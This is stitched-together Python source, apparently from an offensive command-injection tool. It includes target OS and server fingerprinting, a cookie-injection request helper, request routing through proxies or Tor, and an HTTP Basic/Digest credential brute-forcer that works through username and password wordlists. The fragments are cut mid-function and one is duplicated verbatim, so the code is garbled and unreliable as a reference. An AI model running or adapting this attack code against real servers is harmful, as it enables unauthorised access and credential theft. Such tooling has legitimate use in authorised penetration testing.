checks.user_defined_os(): user_defined_os = settings.TARGET_OS # Procedure for target OS identification. for i in range(0,len(settings.SERVER_OS_BANNERS)): if settings.SERVER_OS_BANNERS[i].lower() in server_banner.lower(): found_os_server = True settings.TARGET_OS = settings.SERVER_OS_BANNERS[i].lower() if settings.TARGET_OS == "win" or settings.TARGET_OS == "microsoft" : identified_os = "Windows" if menu.options.os and user_defined_os != "win": if not checks.identified_os(): settings.TARGET_OS = user_defined_os settings.TARGET_OS = identified_os[:3].lower() if menu.options.shellshock: err_msg = "The shellshock module is not available for " err_msg += identified_os + " targets." print settings.print_critical_msg(err_msg) raise SystemExit() else: identified_os = "Unix-like (" + settings.TARGET_OS + ")" if menu.options.os and user_defined_os == "win": if not checks.identified_os(): settings.TARGET_OS = user_defined_os # Procedure for target server identification. found_server_banner = False if settings.VERBOSITY_LEVEL >= 1: info_msg = "Identifying the target server... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() for i in range(0,len(settings.SERVER_BANNERS)): if settings.SERVER_BANNERS[i].lower() in server_banner.lower(): if settings.VERBOSITY_LEVEL >= 1: print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" if settings.VERBOSITY_LEVEL >= 1: success_msg = "The target server was identified as " success_msg += server_banner + Style.RESET_ALL + "." print settings.print_success_msg(success_msg) settings.SERVER_BANNER = server_banner found_server_banner = True # Set up default root paths if settings.SERVER_BANNERS[i].lower() == "apache": if settings.TARGET_OS == "win": settings.SRV_ROOT_DIR = "\\htdocs" else: settings.SRV_ROOT_DIR = "/var/www" if settings.SERVER_BANNERS[i].lower() == "nginx": settings.SRV_ROOT_DIR = "/usr/share/nginx" if settings.SERVER_BANNERS[i].lower() == "microsoft-iis": settings.SRV_ROOT_DIR = "\\inetpub\\wwwroot" break if not found_server_banner: if settings.VERBOSITY_LEVEL >= 1: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" warn_msg = "Heuristics have failed to identify target server." print settings.print_warning_msg(warn_msg) # Procedure for target application identification found_application_extension = False if settings.VERBOSITY_LEVEL >= 1: info_msg = "Identifying the target application ... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() root, application_extension = splitext(urlparse(url).path) settings.TARGET_APPLICATION = application_extension[1:].upper() if settings.TARGET_APPLICATION: found_application_extension = True if settings.VERBOSITY_LEVEL >= 1: print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" success_msg = "The target application was identified as " success_msg += settings.TARGET_APPLICATION + Style.RESET_ALL + "." print settings.print_success_msg(success_msg) # Check for unsupported target applications for i in range(0,len(settings.UNSUPPORTED_TARGET_APPLICATION)): if settings.TARGET_APPLICATION.lower() in settings.UNSUPPORTED_TARGET_APPLICATION[i].lower(): err_msg = settings.TARGET_APPLICATION + " exploitation is not yet supported." print settings.print_critical_msg(err_msg) raise SystemExit() if not found_application_extension: if settings.VERBOSITY_LEVEL >= 1: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" warn_msg = "Heuristics have failed to identify target application." print settings.print_warning_msg(warn_msg) # Load tamper scripts if menu.options.tamper: checks.tamper_scripts() # Store the Server's root dir settings.DEFAULT_SRV_ROOT_DIR = settings.SRV_ROOT_DIR if menu.options.is_admin or menu.options.is_root and not menu.options.current_user: menu.options.current_user = True # Define Python working directory. if settings.TARGET_OS == "win" and menu.options.alter_shell: while True: question_msg = "Do you want to use '" + settings.WIN_PYTHON_DIR question_msg += "' as Python working directory on the target host? [Y/n] > " sys.stdout.write(settings.print_question_msg(question_msg)) python_dir = sys.stdin.readline().replace("\n","").lower() if len(python_dir) == 0: python_dir = "y" if python_dir in settings.CHOICE_YES: break elif python_dir in settings.CHOICE_NO: question_msg = "Please provide a custom working directory for Python (e.g. '" question_msg += settings.WIN_PYTHON_DIR + "') > " sys.stdout.write(settings.print_question_msg(question_msg)) settings.WIN_PYTHON_DIR = sys.stdin.readline().replace("\n","").lower() break else: err_msg = "'" + python_dir + "' is not a valid answer." print settings.print_error_msg(err_msg) pass settings.USER_DEFINED_PYTHON_DIR = True # Check for wrong flags. if settings.TARGET_OS == "win": if menu.options.is_root : warn_msg = "Swithing '--is-root' to '--is-admin' because the " warn_msg += "target has been identified as windows." print settings.print_warning_msg(warn_msg) if menu.options.passwords: warn_msg = "The '--passwords' option, is not yet available for Windows targets." print settings.print_warning_msg(warn_msg) if menu.options.file_upload : warn_msg = "The '--file-upload' option, is not yet available for windows targets. " warn_msg += "Instead, use the '--file-write' option." print settings.print_warning_msg(warn_msg) sys.exit(0) else: if menu.options.is_admin : warn_msg = "Swithing the '--is-admin' to '--is-root' because " warn_msg += "the target has been identified as unix-like. " print settings.print_warning_msg(warn_msg) if found_os_server == False and \ not menu.options.os: # If "--shellshock" option is provided then, # by default is a Linux/Unix operating system. if menu.options.shellshock: pass else: warn_msg = "Heuristics have failed to identify server's operating system." print settings.print_warning_msg(warn_msg) while True: question_msg = "Do you recognise the server's operating system? " question_msg += "[(W)indows/(U)nix/(q)uit] > " sys.stdout.write(settings.print_question_msg(question_msg)) got_os = sys.stdin.readline().replace("\n","").lower() if got_os.lower() in settings.CHOICE_OS : if got_os.lower() == "w": settings.TARGET_OS = "win" break elif got_os.lower() == "u": break elif got_os.lower() == "q": raise SystemExit() else: if got_os == "": got_os = "y" err_msg = "'" + got_os + "' is not a valid answer." print settings.print_error_msg(err_msg) pass if not menu.options.os: if found_server_banner == False: warn_msg = "The server which was identified as " warn_msg += server_banner + " seems unknown." print settings.print_warning_msg(warn_msg) else: found_os_server = checks.user_defined_os() except KeyError: pass # Charset detection. requests.charset_detection(response)
print settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err_msg) raise SystemExit() else: response = headers.check_http_traffic(request) return response """ Check if target host is vulnerable. (Cookie-based injection) """ def cookie_injection(url, vuln_parameter, payload): def inject_cookie(url, vuln_parameter, payload, proxy): if proxy == None: opener = urllib2.build_opener() else: opener = urllib2.build_opener(proxy) if settings.TIME_RELATIVE_ATTACK : payload = urllib.quote(payload)
print settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err_msg) raise SystemExit() else: response = headers.check_http_traffic(request) return response """ Check if target host is vulnerable. (Cookie-based injection) """ def cookie_injection(url, vuln_parameter, payload): def inject_cookie(url, vuln_parameter, payload, proxy): if proxy == None: opener = urllib2.build_opener() else: opener = urllib2.build_opener(proxy) if settings.TIME_RELATIVE_ATTACK : payload = urllib.quote(payload)
def examine_request(request): try: headers.check_http_traffic(request) # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: return proxy.use_proxy(request) # Check if defined Tor (--tor option). elif menu.options.tor: return tor.use_tor(request) else: try: return _urllib.request.urlopen(request) except SocketError as e: if e.errno == errno.ECONNRESET: error_msg = "Connection reset by peer." print(settings.print_critical_msg(error_msg)) elif e.errno == errno.ECONNREFUSED: error_msg = "Connection refused." print(settings.print_critical_msg(error_msg)) raise SystemExit() except ValueError: # Invalid format for the '--header' option. if settings.VERBOSITY_LEVEL < 2: print("[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]") err_msg = "Use '--header=\"HEADER_NAME: HEADER_VALUE\"'" err_msg += "to provide an extra HTTP header or" err_msg += " '--header=\"HEADER_NAME: " + settings.WILDCARD_CHAR + "\"' " err_msg += "if you want to try to exploit the provided HTTP header." print(settings.print_critical_msg(err_msg)) raise SystemExit() except Exception as err_msg: if "unauthorized" in str(err_msg).lower(): if menu.options.ignore_code == settings.UNAUTHORIZED_ERROR: pass elif menu.options.auth_type and menu.options.auth_cred: err_msg = "The provided pair of " + menu.options.auth_type err_msg += " HTTP authentication credentials '" + menu.options.auth_cred + "'" err_msg += " seems to be invalid." err_msg += " Try to rerun without providing '--auth-cred' and '--auth-type' options," err_msg += " in order to perform a dictionary-based attack." print(settings.print_critical_msg(err_msg)) raise SystemExit() else: try: error_msg = str(err_msg.args[0]).split("] ")[1] + "." except IndexError: error_msg = str(err_msg).replace(": ", " (") + ")." print(settings.print_critical_msg(error_msg)) raise SystemExit() except _urllib.error.HTTPError as err_msg: error_description = "" if len(str(err_msg).split(": ")[1]) == 0: error_description = "Non-standard HTTP status code" err_msg = str(err_msg).replace(": ", " (") + error_description + ")." if menu.options.bulkfile: warn_msg = "Skipping URL '" + url + "' - " + err_msg print(settings.print_warning_msg(warn_msg)) if settings.EOF: print("") return False else: print(settings.print_critical_msg(err_msg)) raise SystemExit except _urllib.error.URLError as e: err_msg = "Unable to connect to the target URL" try: err_msg += " (" + str(e.args[0]).split("] ")[1] + ")." except IndexError: err_msg += "." pass if menu.options.bulkfile: err_msg = "Skipping URL '" + url + "' - " + err_msg print(settings.print_critical_msg(err_msg)) if settings.EOF: print("") return False else: print(settings.print_critical_msg(err_msg)) raise SystemExit
def http_auth_cracker(url, realm): # Define the HTTP authentication type. authentication_type = menu.options.auth_type # Define the authentication wordlists for usernames / passwords. usernames, passwords = define_wordlists() i = 1 found = False total = len(usernames) * len(passwords) for username in usernames: for password in passwords: float_percent = "{0:.1f}%".format(round(((i*100)/(total*1.0)),2)) # Check if verbose mode on if settings.VERBOSITY_LEVEL >= 1: payload = "pair of credentials '" + username + ":" + password + "'" if settings.VERBOSITY_LEVEL > 1: print settings.print_checking_msg(payload) else: sys.stdout.write("\r" + settings.print_checking_msg(payload) + " ") sys.stdout.flush() try: # Basic authentication if authentication_type.lower() == "basic": request = urllib2.Request(url) base64string = base64.encodestring(username + ":" + password)[:-1] request.add_header("Authorization", "Basic " + base64string) headers.do_check(request) headers.check_http_traffic(request) result = urllib2.urlopen(request) # Digest authentication elif authentication_type.lower() == "digest": authhandler = urllib2.HTTPDigestAuthHandler() authhandler.add_password(realm, url, username, password) opener = urllib2.build_opener(authhandler) urllib2.install_opener(opener) request = urllib2.Request(url) headers.check_http_traffic(request) result = urllib2.urlopen(request) # Store valid results to session admin_panel = url session_handler.import_valid_credentials(url, authentication_type, admin_panel, username, password) found = True except KeyboardInterrupt : raise except: pass if found: if not settings.VERBOSITY_LEVEL >= 1: float_percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: if str(float_percent) == "100.0%": if not settings.VERBOSITY_LEVEL >= 1: float_percent = Fore.RED + "FAILED" + Style.RESET_ALL else: i = i + 1 if not settings.VERBOSITY_LEVEL >= 1: info_msg = "Checking for a valid pair of credentials... [ " + float_percent + " ]" sys.stdout.write("\r\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if found: valid_pair = "" + username + ":" + password + "" print "" success_msg = "Identified a valid pair of credentials '" success_msg += valid_pair + Style.RESET_ALL + Style.BRIGHT + "'." print settings.print_success_msg(success_msg) return valid_pair err_msg = "Use the '--auth-cred' option to provide a valid pair of " err_msg += "HTTP authentication credentials (i.e --auth-cred=\"admin:admin\") " err_msg += "or place an other dictionary into '" err_msg += os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'txt')) + "/' directory." print "\n" + settings.print_critical_msg(err_msg) return False # eof